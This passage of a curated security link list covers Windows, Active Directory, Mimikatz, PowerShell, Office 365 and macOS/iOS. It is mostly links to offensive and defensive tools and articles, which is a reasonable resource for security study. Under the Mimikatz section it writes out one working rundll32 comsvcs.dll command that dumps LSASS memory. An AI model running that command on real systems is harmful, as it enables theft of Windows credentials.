- [Six Facts about Address Space Layout Randomization on Windows](https://www.mandiant.com/resources/six-facts-about-address-space-layout-randomization-on-windows)
- [How to bypass Defender in a few easy steps](https://arty-hlr.com/blog/2021/05/06/how-to-bypass-defender/)
- [whids](https://github.com/0xrawsec/whids): Open Source EDR for Windows.
- [Backdoor .NET assemblies with… dnSpy](https://rastamouse.me/backdoor-net-assemblies-with-dnspy-%f0%9f%a4%94/)
- [Windows-auditing-mindmap](https://github.com/mdecrevoisier/Windows-auditing-mindmap): Set of Mindmaps providing a detailed overview of the different #Windows auditing capacities and event log files.
- [If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.](https://twitter.com/inversecos/status/1451426036013420553/photo/1) ```You can find these bitmaps at this location: %APPDATALOCAL%\Microsoft\Terminal Server Client\Cache\```
- [Here are a few tool resources for using WinRM w/o PowerShell](https://twitter.com/bohops/status/1453353318290542593)
- [winrs](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/winrs)
- [Scripting in Windows Remote Management](https://docs.microsoft.com/en-us/windows/win32/winrm/scripting-in-windows-remote-management)
- [CSharpWinRM](https://github.com/mez-0/CSharpWinRM):.NET 4.0 WinRM API Command Execution
- [WinRMDLL](https://github.com/mez-0/winrmdll): C++ WinRM API via Reflective DLL
- [WSMan-WinRM](https://github.com/bohops/WSMan-WinRM): A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object.
- [pywinrm](https://pypi.org/project/pywinrm/0.2.2/): is a Python client for the Windows Remote Management (WinRM) service. It allows you to invoke commands on target Windows machines from any machine that can run Python.
- [Abusing Windows Remote Management (WinRM) with Metasploit](https://www.rapid7.com/blog/post/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit/)
- [LACheck](https://github.com/mitchmoser/LACheck): Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration.
- [awesome_windows_logical_bugs](https://github.com/sailay1996/awesome_windows_logical_bugs/): collect for learning cases
- [Attacking RDP from Inside](https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside): How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
- [Dynamic Invocation in .NET to bypass hooks](https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/)
- [LowBox Token Permissive Learning Mode](https://www.tiraniddo.dev/2021/09/lowbox-token-permissive-learning-mode.html)
- [DInjector](https://github.com/snovvcrash/DInjector/): Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL.
- [SMB-Session-Spoofing](https://github.com/Sq00ky/SMB-Session-Spoofing): The goal of this program is to create a fake SMB Session.
- [Windows Kernel Introspection (WKI)](https://amonsec.net/posts/2022/09/0000000d/)
- [MSSQL Analysis Services - Coerced Authentication](https://github.com/p0dalirius/MSSQL-Analysis-Coerce): A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.
- [Reinschauer](https://github.com/ps1337/reinschauer): A PoC to remotely control Windows machines over Websockets.
- [Lsass Shtinkering](https://github.com/deepinstinct/Lsass-Shtinkering): New method of dumping LSASS by abusing the Windows Error Reporting service. It sends a message to the service with the ALPC protocol to report an exception on LSASS. This report will cause the service to dump the memory of LSASS.
- [Windows Persistence Techniques](https://drive.google.com/file/d/1gijNQ5yiCVonj450hFgwpsth7fZmvNPK/view)
- [Windows XP / Windows Server 2003 VLK key generator](https://github.com/Endermanch/XPKeygen)
- [Banshee](https://github.com/eversinc33/Banshee): Experimental Windows x64 Kernel Driver/Rootkit.

#### Active Directory

- [Active Directory Control Paths](https://github.com/ANSSI-FR/AD-control-paths)
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html), using [Responder](https://github.com/lgandx/Responder)(LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
- [Invoke-ADLabDeployer](https://github.com/outflanknl/Invoke-ADLabDeployer): Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
- [PowerShellClassLab](https://github.com/jaredhaight/PowerShellClassLab): This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server.
- [ADImporter](https://github.com/curi0usJack/ADImporter)
- [Low Privilege Active Directory Enumeration from a non-Domain Joined Host](https://www.attackdebris.com/?p=470)
- [Active Directory as a C2](https://akijosberryblog.wordpress.com/2018/03/17/active-directory-as-a-c2-command-control/)
- [Escalating privileges with ACLs in Active Directory](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
- [Active Directory Kill Chain Attack & Defense](https://github.com/infosecn1nja/AD-Attack-Defense): This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- [#TR19 Active Directory Security Track](https://insinuator.net/2019/01/tr19-active-directory-security-track/)
- [Penetration Testing Active Directory, Part I](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/): I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD.
- [Penetration Testing Active Directory, Part II](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/): For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation.
- [Wagging the Dog](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html): Abusing Resource-Based Constrained Delegation to Attack Active Directory.
- [Exploiting PrivExchange](https://chryzsh.github.io/exploiting-privexchange/): The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host.
- BloodHound:
- [BloodHound](https://github.com/BloodHoundAD/BloodHound): Six Degrees of Domain Admin, and a [Python](https://github.com/fox-it/BloodHound.py) based ingestor for BloodHound
- [BloodHound Database Creator](https://github.com/BloodHoundAD/BloodHound-Tools/tree/master/DBCreator): This python script will generate a randomized data set for testing BloodHound features and analysis.
- [Case Study: Password Analysis with BloodHound](https://posts.specterops.io/case-study-password-analysis-with-bloodhound-a3d264736c7?gi=f1d43999d905)
- [Introducing BloodHound 4.0: The Azure Update](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
- [SharpHound3](https://github.com/BloodHoundAD/SharpHound3)
- [ATTACK MAPPING WITH BLOODHOUND](https://blog.stealthbits.com/local-admin-mapping-bloodhound)
- [aclpwn.py](https://github.com/fox-it/aclpwn.py/): Active Directory ACL exploitation with BloodHound. [Exploit ACL Based Privilege Escalation Paths in Active Directory](https://www.darknet.org.uk/2021/07/aclpwn-py-exploit-acl-based-privilege-escalation-paths-in-active-directory/)
- [BloodHound.py](https://github.com/fox-it/BloodHound.py): A Python based ingestor for BloodHound.
- [BloodHound-Tools](https://github.com/zeronetworks/BloodHound-Tools): Collection of tools that reflect the network dimension into Bloodhound's data.
- [Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)](https://twitter.com/_nwodtuhs/status/1451510341041594377) - [The Hacker Recipes](https://github.com/ShutdownRepo/The-Hacker-Recipes):
- [Pass the Certificate](https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate)
- [UnPAC the hash](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash)
- [Shadow Credentials](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
- [Certificate Services (AD-CS)](https://www.thehacker.recipes/ad/movement/ad-cs)
- [Certificate templates](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates)
- [CA configuration](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration)
- [Access controls](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
- [Web endpoints](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
- Kerberos:
- [Using Kerberos for Authentication Relay Attacks](https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html)
- [Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)](https://twitter.com/_nwodtuhs/status/1451510341041594377/photo/1)
- [Kerberos Resource-Based Constrained Delegation](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/): When an Image Change Leads to a Privilege Escalation
- [New-KrbtgtKeys.ps1](https://github.com/microsoft/New-KrbtgtKeys.ps1): This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation.
- [Kerberos cheatsheet](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a): A cheatsheet with commands that can be used to perform kerberos attacks.
- [Bypassing AD account lockout for a compromised account](https://medium.com/@markmotig/bypassing-ad-account-lockout-for-a-compromised-account-5c908d663de8)
- [Azure AD and ADFS best practices](https://www.microsoft.com/en-us/microsoft-365/blog/2018/03/05/azure-ad-and-adfs-best-practices-defending-against-password-spray-attacks/): Defending against password spray attacks
- [NetNTLMtoSilverTicket](https://github.com/NotMedic/NetNTLMtoSilverTicket): SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
- [Domain Goodness](https://www.blackhillsinfosec.com/domain-goodness-learned-love-ad-explorer/) – How I Learned to LOVE AD Explorer
- [windapsearch](https://github.com/ropnop/windapsearch): Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
- [LDAP Ping and Determining Your Machine’s Site](https://blog.joeware.net/2019/03/31/5935/)
- [Non-Admin NTLM Relaying & ETERNALBLUE Exploitation](https://medium.com/@technicalsyn/eternalrelayx-py-non-admin-ntlm-relaying-eternalblue-exploitation-dab9e2b97337)
- [Active Directory administrative tier model](https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material)
- [Exchange-AD-Privesc](https://github.com/gdedrouas/Exchange-AD-Privesc): Exchange privilege escalations to Active Directory
- [Hunting for reconnaissance activities using LDAP search filters](https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Hunting-for-reconnaissance-activities-using-LDAP-search-filters/ba-p/824726)
- [Faking an AD account password change is possible , but detectable.](https://twitter.com/PyroTek3/status/1177355).
- Ethical Hacking Lessons — [Building Free Active Directory Lab in Azure](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f)
- [Configure the log analytics wizard](https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/tutorial-log-analytics-wizard)
- [Reset the krbtgt account password/keys](https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51)
- [GetNPUsers & Kerberos Pre-Auth Explained](https://www.youtube.com/watch?v=pZSyGRjHNO4)
- [WinPwn](https://github.com/S3cur3Th1sSh1t/WinPwn): Automation for internal Windows Penetrationtest / AD-Security
- [BadBlood](https://github.com/davidprowe/BadBlood) by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active…
- [Vulnerable-AD](https://github.com/WazeHell/vulnerable-AD): Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab .
- [EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE](https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/)
- [Active-Directory-Exploitation-Cheat-Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet): A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
- [Active Directory Lab Setup Tool](https://browninfosecguy.com/Active-Directory-Lab-Setup-Tool). [ADLab](https://github.com/browninfosecguy/ADLab): Active Directory Lab for Penetration Testing
- [Rubeus](https://github.com/GhostPack/Rubeus): is a C# toolset for raw Kerberos interaction and abuses.
- [Enabling Active Directory DNS query logging](https://www.adamcouch.co.uk/active-directory-dns-logging/)
- [SharpMapExec](https://github.com/cube0x0/SharpMapExec): This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
- [Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range](https://www.splunk.com/en_us/blog/security/detecting-cve-2020-1472-using-splunk-attack-range.html)
- [ADTimeline](https://github.com/ANSSI-FR/ADTimeline): Timeline of Active Directory changes with replication metadata.
- [Still Passing the Hash 15 Years Later](https://passing-the-hash.blogspot.com/2012/08/samba-stuff-pt-1-basics-smbclient.html)
- [Azure-Sentinel](https://github.com/Azure/Azure-Sentinel): Cloud-native SIEM for intelligent security analytics for your entire enterprise.
- [Detecting Abuse of Authentication Mechanisms](https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF)
- [Detecting the Elusive: Active Directory Threat Hunting](https://adsecurity.org/?p=3621)
- [Exporting AD FS certificates revisited: Tactics, Techniques and Procedures](https://o365blog.com/post/adfs/)
- [GPO Abuse: “You can’t see me”](https://pentestmag.com/gpo-abuse-you-cant-see-me/)
- [SERVER (UN)TRUST ACCOUNT](https://stealthbits.com/blog/server-untrust-account/): Active Directory persistence through userAccountControl manipulation.
- [Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability](https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/) [When discussing ADCS attacks, particularly ESC8, most go straight for the DC$ account.](https://twitter.com/chvancooten/status/1453034204049051652)
- [DSInternals](https://github.com/MichaelGrafnetter/DSInternals): Directory Services Internals (DSInternals) PowerShell Module and Framework.
- [Certipy](https://github.com/ly4k/Certipy) is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).
- [Cobalt strike MANUALS_V2](https://github.com/silence-is-best/files/blob/main/translate_f.pdf) Increasing privileges and collecting information
- [Active Directory (Attack & Defense )](https://0xsp.com/offensive/active-directory-attack-defense)
- [Your Azure AD Connect server ... it's a Tier 0 asset](https://twitter.com/lkarlslund/status/1478780584818356230/photo/1)
- [Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump](https://imphash.medium.com/shooting-up-on-prem-to-cloud-detecting-aadconnect-creds-dump-422b21128729)
- [AADInternals](https://github.com/Gerenios/AADInternals): PowerShell module for administering Azure AD and Office 365.
- [From Zero to Domain Admin](https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/)
- [Attacking Active Directory: 0 to 0.9](https://zer1t0.gitlab.io/posts/attacking_ad/)
- [Offensive WMI - Active Directory Enumeration](https://0xinfection.github.io/posts/wmi-basics-part-1/) - Part [2](https://0xinfection.github.io/posts/wmi-classes-methods-part-2/), [3](https://0xinfection.github.io/posts/wmi-registry-part-3/), [4](https://0xinfection.github.io/posts/wmi-recon-enum/) and [5](https://0xinfection.github.io/posts/wmi-ad-enum/).
- [BloodyAD](https://github.com/CravateRouge/bloodyAD) is an Active Directory Privilege Escalation Framework.
- [SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted)
- [KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp): a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
- [Harvesting Active Directory credentials via HTTP Request Smuggling](https://northwave-security.com/harvesting-active-directory-credentials-via-http-request-smuggling/)
- [Ping Castle Cloud](https://github.com/vletoux/PingCastleCloud): Audit program for AzureAD.
- [Protection of privileged users and groups by Azure AD Restricted Management Administrative Units](https://www.cloud-architekt.net/restricted-management-administrative-unit/) [source](https://twitter.com/Thomas_Live/status/1671750717550280704)

##### Mimikatz

- [Active Directory Kill Chain Attack & Defense](https://github.com/infosecn1nja/AD-Attack-Defense): This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- [A little tool to play with Windows security](https://github.com/gentilkiwi/mimikatz)
- [Preventing Mimikatz Attacks – Blue Team – Medium](https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5)
- [pypykatz](https://github.com/skelsec/pypykatz): Mimikatz implementation in pure Python
- [Walk-through Mimikatz sekurlsa module](https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa/)
- (pt-br) [Mimikatz: Mitigando ataques de roubo de credenciais](https://medium.com/sidechannel-br/mimikatz-mitigando-ataques-de-roubo-de-credenciais-f18eddd32b34)
- [PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ](https://blog.stealthbits.com/passing-the-hash-with-mimikatz)
- [SharpKatz](https://github.com/b4rtik/SharpKatz): Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
- [Protecting RDP Passwords from Mimikatz Using Remote Credential Guard](https://blog.devolutions.net/2021/05/protecting-rdp-passwords-from-mimikatz-using-remote-credential-guard)
- [Updating Mimikatz in Metasploit](https://infosecwriteups.com/updating-mimikatz-in-metasploit-1ce505e811e1)
- [Capturing Credentials with mimikatz](https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz)
- [Dumping User Passwords from Windows Memory with Mimikatz](http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/)
- [HandleKatz](https://github.com/codewhitesec/HandleKatz): PIC lsass dumper using cloned handles.
- [CredentialDumping without Mimikatz](https://twitter.com/inversecos/status/1450331995112804358) ```rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\.dmp full;Wait-Process -Id (Get-Process rundll32).id```
- [Dumping Lsass Without Mimikatz](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz)

#### Powershell

- [PowerShell Gallery](https://www.powershellgallery.com/)
- [PowerShell Scripts](https://github.com/Arno0x/PowerShellScripts): Collection of PowerShell scripts
- [Example of Malicious DLL Injected in PowerShell](https://isc.sans.edu/diary/26512)
- [POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1](https://www.bc-security.org/post/powershell-logging-obfuscation-and-some-newish-bypasses-part-1/)
- [Empire](https://github.com/BC-SECURITY/Empire): Empire is a PowerShell and Python 3.x post-exploitation framework.
- [Invisi-Shell](https://github.com/OmerYa/Invisi-Shell): Hide your Powershell script in plain sight. Bypass all Powershell security features.
- [DevSec Defense](https://www.x33fcon.com/archive/2018/slides/x33fcon18_DevSecDefense_DanielBohannon.pdf)- How DevOps Practices Can Drive Detection Development For Defenders
- [Chimera](https://github.com/tokyoneon/chimera): is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
- [Geeking out with UEFI, again](https://oofhours.com/2020/11/25/geeking-out-with-uefi-again/)
- [PrivescCheck](https://github.com/itm4n/PrivescCheck): Privilege Escalation Enumeration Script for Windows
- [Stracciatella](https://github.com/mgeeky/Stracciatella): OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
- [Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage): Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
- [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash): powerShell Pass The Hash Utils
- [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI): DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs.
- [PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection](https://adsecurity.org/?p=2921)
- [CheeseTools](https://github.com/klezVirus/CheeseTools): Self-developed tools for Lateral Movement/Code Execution.
- [Random](https://github.com/leechristensen/Random): a lot of powershell scripts.
- [CredPhish](https://github.com/tokyoneon/credphish): is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS.
- [PowerShell Obfuscation](https://www.offensive-security.com/offsec/powershell-obfuscation/)
- [powercat](https://github.com/besimorhino/powercat): netshell features all in version 2 powershell.
- [PSByPassCLM](https://github.com/padovah4ck/PSByPassCLM): Bypass for PowerShell Constrained Language Mode.
- [Basic PowerShell for Pentesters](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters)
- [Invoke-CradleCrafter](https://github.com/danielbohannon/Invoke-CradleCrafter): PowerShell Remote Download Cradle Generator & Obfuscator. [the-invoke-cradlecrafter-overview](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-cradlecrafter-overview)
- [LDAP Monitor](https://github.com/p0dalirius/LDAPmonitor): Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
- [Understanding and Bypassing AMSI](https://x64sec.sh/understanding-and-bypassing-amsi/)
- [Exploring PowerShell AMSI and Logging Evasion](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
- [AMSI.fail](https://amsi.fail/): generates obfuscated PowerShell snippets that break or disable AMSI for the current process. [code](https://github.com/Flangvik/AMSI.fail)
- [INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES](https://www.bc-security.org//courses/introduction-to-sandbox-evasion-and-amsi-bypasses)
- [PSBits](https://github.com/gtworek/PSBits): Simple (relatively) things allowing you to dig a bit deeper than usual.
- [Evading Detection: A Beginner's Guide to Obfuscation](https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation)
- [comsvcs MiniDump examples](https://gist.github.com/JohnLaTwC/3e7dd4cd8520467df179e93fb44a434e)
- [Beginning PowerShell Empire - Packet Analysis](https://www.securitynik.com/2022/02/beginning-powershell-empire-packet.html)

#### Office and O/365

- [Detailed properties in the Office 365 audit log](https://docs.microsoft.com/en-us/office365/securitycompliance/detailed-properties-in-the-office-365-audit-log)
- [Office 365 Mail Forwarding Rules (and other Mail Rules too)](https://isc.sans.edu/forums/diary/Office+365+Mail+Forwarding+Rules+and+other+Mail+Rules+too/26484/)
- [Application Guard for Office (public preview) for admins](https://github.com/MicrosoftDocs/microsoft-365-docs/blob/public/microsoft-365/security/office-365-security/install-app-guard.md)
- [o365spray](https://github.com/0xZDH/o365spray): Username enumeration and password spraying tool aimed at Microsoft O365.
- [AdminSubmissionsAPI scripts for URL and mail submission.](https://github.com/pawp81/AdminSubmissionsAPI) Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers.
- [Commentator](https://github.com/clr2of8/Commentator): Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m).
- [Exploiting MFA Inconsistencies on Microsoft Services](https://www.blackhillsinfosec.com/exploiting-mfa-inconsistencies-on-microsoft-services/). [MFASweep](https://github.com/dafthack/MFASweep): A tool for checking if MFA is enabled on multiple Microsoft Services
- [msoffcrypto-tool](https://github.com/nolze/msoffcrypto-tool): Python tool and library for decrypting MS Office files with passwords or other keys
- [pyxlsb2](https://github.com/DissectMalware/pyxlsb2): an Excel 2007+ Binary Workbook (xlsb) parser for Python
- [Making Clouds Rain :: Remote Code Execution in Microsoft Office 365](https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html#fn:1)
- [The worst of the two worlds: Excel meets Outlook](https://adepts.of0x.cc/vba-outlook/)
- [Go365](https://github.com/optiv/Go365): An Office365 User Attack Tool.
- [Microsoft-365-Defender-Hunting-Queries](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries): Sample queries for Advanced hunting in Microsoft 365 Defender
- [m365_groups_enum](https://github.com/cnotin/m365_groups_enum): Enumerate Microsoft 365 Groups in a tenant with their metadata.
- [How to hunt for LDAP reconnaissance within M365 Defender?](https://m365internals.com/2021/05/22/how-to-hunt-for-ldap-reconnaissance-within-m365-defender/)
- [Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs](https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138)
- [Reproducing The ProxyShell Pwn2Own Exploit](https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1)
- [ProxyLogon is Just the Tip of the Iceberg](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf): A [New Attack](https://twitter.com/GossiTheDog/status/1423608644634136583) Surface on Microsoft Exchange Server!
- [PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER](https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server)
- [How Default Permissions on Microsoft Power Apps Exposed Millions](https://www.upguard.com/breaches/power-apps)
- [Excel Recipe: Some VBA Code with a Touch of Excel4 Macro](https://isc.sans.edu/forums/diary/Excel+Recipe+Some+VBA+Code+with+a+Touch+of+Excel4+Macro/27864/)
- [An XML-Obfuscated Office Document (CVE-2021-40444)](https://isc.sans.edu/forums/diary/An+XMLObfuscated+Office+Document+CVE202140444/27860/)
- [Simple Analysis Of A CVE-2021-40444 .docx Document](https://isc.sans.edu/forums/diary/Simple+Analysis+Of+A+CVE202140444+docx+Document/27848/)
- [cli-microsoft365](https://github.com/pnp/cli-microsoft365): Manage Microsoft 365 and SharePoint Framework projects on any platform. [site](https://pnp.github.io/cli-microsoft365/) [export teams conversations](https://techgenix.com/export-microsoft-teams-conversations-with-cli-for-microsoft-365/)
- [There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.](https://twitter.com/GossiTheDog/status/1450176589820465156)
- [Advanced hunting queries for Microsoft 365 Defender](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries): Sample queries for Advanced hunting in Microsoft 365 Defender.
- [All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)](https://medium.com/csg-govtech/all-your-d-base-are-belong-to-us-part-2-code-execution-in-microsoft-office-cve-2021-38646-fa6e70362162)
- [MSSpray](https://github.com/SecurityRiskAdvisors/msspray) is used to conduct password spray attacks against Azure AD as well as validate the implementation of MFA on Azure and Office 365 endpoints
- [Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows](https://github.com/nmantani/archiver-MOTW-support-comparison)
- [SnaffPoint](https://github.com/nheiniger/SnaffPoint): A tool for pointesters to find candies in SharePoint.

### macOS/iOS

- [Apple Open Source](https://opensource.apple.com/) and [Unnoficial Apple Open Source Mirror](https://github.com/apple-open-source-mirror/Security): security mirror.
- An iOS App In [Assembly](https://github.com/richardjrossiii/iOSAppInAssembly)
- [Having fun with macOS 1days](https://github.com/theori-io/zer0con2018_singi)
- [x18-leak](https://github.com/bazad/x18-leak): iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
- [EmPyre](https://github.com/empireproject/empyre): A post-exploitation OS X/Linux agent written in Python 2.7
- Kanzi: It's a cable that's used by Apple's own engineers to debug various hardware (mainly iOS-devices, of course) with SWD (Serial Wire Debug - JTAG for ARM cores) - [Apple Lightning (cont.) - serial number reading](https://nyansatan.github.io/lightning-snr/). [kanzitools](https://github.com/NyanSatan/kanzitools): Set of tools to interact with various aspects of Kanzi probe and its derivatives.
- [SDQAnalyzer](https://github.com/nezza/SDQAnalyzer): a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol.
- [Inside Code Signing](https://www.objc.io/issues/17-security/inside-code-signing/)
- [jelbrekTime](https://github.com/tihmstar/jelbrekTime): An developer jailbreak for Apple watch S3 watchOS 4.1
- [Disabling MacOS SIP via a VirtualBox kext Vulnerability](https://www.mdsec.co.uk/2018/08/disabling-macos-sip-via-a-virtualbox-kext-vulnerability/)
- [mOSL](https://github.com/0xmachos/mOSL): Bash script to audit and fix macOS High Sierra (10.13.x) security settings
- Objective-See:
- [DoNotDisturb](https://github.com/objective-see/DoNotDisturb): Detect Evil Maid Attacks
- [sniffMK](https://github.com/objective-see/sniffMK): sniff mouse and keyboard events
- [Remote Mac Exploitation Via Custom URL Schemes](https://objective-see.com/blog/blog_0x38.html)
- [The Mac Malware of 2018](https://objective-see.com/blog/blog_0x3C.html)
- [KisMac2](https://github.com/IGRSoft/KisMac2): KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.
- [osx-security-awesome](https://github.com/kai5263499/osx-security-awesome): A collection of OSX and iOS security resources
- [threadexec](https://github.com/bazad/threadexec): A library to execute code in the context of other processes on iOS 11.
- [Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage](https://www.mac4n6.com/blog/2018/8/5/knowledge-is-power-using-the-knowledgecdb-database-on-macos-and-ios-to-determine-precise-user-and-application-usage)
- [iOS12 Kernelcache Laundering](https://www.synacktiv.com/posts/exploit/ios12-kernelcache-laundering.html)
- [kernelcache-laundering](https://github.com/Synacktiv/kernelcache-laundering): load iOS12 kernelcaches and PAC code in IDA
- [Armor](https://github.com/tokyoneon/Armor): is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. [Tool Designed To Create Encrypted macOS Payloads](https://www.kitploit.com/2018/11/armor-tool-designed-to-create-encrypted.html)
- [inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c](https://gist.github.com/Proteas/22525ef733eed42313627a94af022221)
- [opendrop](https://github.com/seemoo-lab/opendrop): An open Apple AirDrop implementation written in Python
- [A sample of the iOS malware](https://twitter.com/craiu/status/1176437943369703424)- sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
